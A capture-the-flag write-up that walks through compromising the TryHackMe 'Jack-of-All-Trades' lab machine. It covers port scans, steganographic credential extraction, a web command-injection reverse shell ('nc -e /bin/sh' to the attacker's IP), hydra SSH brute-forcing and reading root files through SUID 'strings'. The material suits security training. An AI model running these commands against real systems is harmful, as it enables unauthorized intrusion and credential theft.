THM Writeup – Jack-of-All-Trades
Boot-to-root originally designed for Securi-Tay 2020
Jack is a man of a great many talents. The zoo has employed him to capture the penguins due to his years of penguin-wrangling experience, but all is not as it seems… We must stop him! Can you see through his facade of a forgetful old toymaker and bring this lunatic down?
Add IP address to your hosts file:
echo '10.10.10.140 jack.thm' >> /etc/hostsScan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv jack.thm
PORT STATE SERVICE REASON
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64Get more details about open ports:
nmap -T4 -A -p 22,80 jack.thm
PORT STATE SERVICE VERSION
22/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
| 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
| 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (EdDSA)There are 2 ports open, however they are switched – usually a webserver is on port 80 and SSH on port 22. In this case:
- SSH is on port 80
- webserver is on port 22
Directory scan the web application:
gobuster dir -u http://jack.thm:22 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
/index.html (Status: 200)
/assets (Status: 301)
/recovery.php (Status: 200)
/server-status (Status: 403)
===============================================================When we try to browse web application on port 22, we get:
We have to enable a restricted port – read more here – follow the instructions to enable restricted port 22.
Now browse to http://jack.thm:22
As we can read “If you employ me you might find random notes lying around as reminders” let’s view the page source:
We found a string that looks like base64 encoded.
Use e.g. CyberChef to decode it:
Now browse to http://jack.thm:22/recovery.php
I tried to log in as jack and johny with the password we found earlier, but no luck. So I viewed the page source again:
Again we found a string that looks like base64 encoded:
So let’s browse to http://bit.ly/2TvYQ2S – it redirects us to https://en.wikipedia.org/wiki/Stegosauria:
Ok the credentials are probably hidden in the stego picture on the homepage.
Download the stegosaurus picture from homepage and check if there is anything hidden – as passphrase use the password/phrase we found earlier:
root@ip-10-10-112-247:~# steghide info stego.jpg
"stego.jpg":
format: jpeg
capacity: 1.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "creds.txt":
size: 58.0 Byte
encrypted: rijndael-128, cbc
compressed: yesBingo, so let’s extract the hidden .txt file and then read it:
root@ip-10-10-112-247:~# steghide extract -sf stego.jpg
Enter passphrase:
wrote extracted data to "creds.txt".
root@ip-10-10-112-247:~# cat creds.txt
Hehe. Gotcha!
You're on the right path, but wrong image!Lmao, so do the same with the image of a toy:
root@ip-10-10-112-247:~# steghide info jackinthebox.jpg
"jackinthebox.jpg":
format: jpeg
capacity: 5.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!Nothing again, let’s try to do the same with the header image – first image on the homepage:
root@ip-10-10-112-247:~# steghide info header.jpg
"header.jpg":
format: jpeg
capacity: 3.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "cms.creds":
size: 93.0 Byte
encrypted: rijndael-128, cbc
compressed: yesGreat, now extract the .creds file and read it:
root@ip-10-10-112-247:~# steghide extract -sf header.jpg
Enter passphrase:
wrote extracted data to "cms.creds".
root@ip-10-10-112-247:~# cat cms.creds
Here you go Jack. Good thing you thought ahead!
Username: [REDACTED]
Password: [REDACTED]Now go back to the recovery page http://jack.thm:22/recovery.php and login using credentials we have just found:
User Flag
Hm, great, RCE through web application – first try same basic command like id:
http://jack.thm:22/[REDACTED]/index.php?cmd=id
Run a listener:
nc -lnvp 4242“Browse” to:
http://jack.thm:22/[REDACTED]/index.php?cmd=nc -e /bin/sh 10.10.112.247 4242and we received a reverse shell:
Look around:
ls -la /home
total 16
drwxr-xr-x 3 root root 4096 Feb 29 2020 .
drwxr-xr-x 23 root root 4096 Feb 29 2020 ..
drwxr-x--- 3 jack jack 4096 Feb 29 2020 jack
-rw-r--r-- 1 root root 408 Feb 29 2020 jacks_password_list
cat /home/jacks_password_list
*hc[REDACTED]=0K
eN<[REDACTED]I5,
X<([REDACTED]MGC
,,a[REDACTED]afb
ITM[REDACTED]?>@
0Hg[REDACTED]8yF
sjR[REDACTED]ITu
[8V[REDACTED][WB
yTq[REDACTED]}PD
Sc.[REDACTED]C4}
9;}[REDACTED]X.T
M41[REDACTED]3%p
GZx[REDACTED]SO<
.MV[REDACTED]cAC
2fh[REDACTED]f51
TDF[REDACTED]hBO
v]X[REDACTED]3EF
9iY[REDACTED]4d1
8TI[REDACTED]AY^
SeU[REDACTED]+yt
n.F[REDACTED]s5d
8lN[REDACTED][pM
z@e[REDACTED]Dz@
ow5[REDACTED]rSoWe found jack’s passwords, let’s try to use hydra to crack SSH.
First save the passwords to a file and the run hydra against SSH:
hydra -l jack -P jackpass ssh://jack.thm -s 80
[80][ssh] host: jack.thm login: jack password: [REDACTED]Now use these credentials to login via SSH:
root@ip-10-10-112-247:~# ssh jack@jack.thm -p 80
jack@jack.thm's password:
jack@jack-of-all-trades:~$Find the user flag:
jack@jack-of-all-trades:~$ ls -la
total 312
drwxr-x--- 3 jack jack 4096 Feb 29 2020 .
drwxr-xr-x 3 root root 4096 Feb 29 2020 ..
lrwxrwxrwx 1 root root 9 Feb 29 2020 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack 220 Feb 29 2020 .bash_logout
-rw-r--r-- 1 jack jack 3515 Feb 29 2020 .bashrc
drwx------ 2 jack jack 4096 Feb 29 2020 .gnupg
-rw-r--r-- 1 jack jack 675 Feb 29 2020 .profile
-rwxr-x--- 1 jack jack 293302 Feb 28 2020 user.jpguser.jpg is probably our user flag, download it to your attacking machine
Run a python http server on the target machine:
jack@jack-of-all-trades:~$ python -m SimpleHTTPServer 9000
Serving HTTP on 0.0.0.0 port 9000 ...Download the user.jpg to your attacking machine:
root@ip-10-10-112-247:~# wget http://jack.thm:9000/user.jpg
--2022-02-03 09:20:12-- http://jack.thm:9000/user.jpg
Resolving jack.thm (jack.thm)... 10.10.10.140
Connecting to jack.thm (jack.thm)|10.10.10.140|:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 293302 (286K) [image/jpeg]
Saving to: \u2018user.jpg\u2019
user.jpg 100%[===================>] 286.43K --.-KB/s in 0.003s
2022-02-03 09:20:12 (96.8 MB/s) - \u2018user.jpg\u2019 saved [293302/293302]Open the .jpg file:
Root Flag
Now to escalate our privileges I tried basic vectors:
sudo -l
cat /etc/crontab
getcap -r / 2>/dev/nullbut no luck.
Then I tried SUID bits:
jack@jack-of-all-trades:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/strings
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/procmail
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/sustrings is the one that stands out.
Check GTFOBins:
So we just need to “read” the file with strings command:
jack@jack-of-all-trades:~$ strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: [REDACTED]Do you like this writeup? Check out other THM Writeups.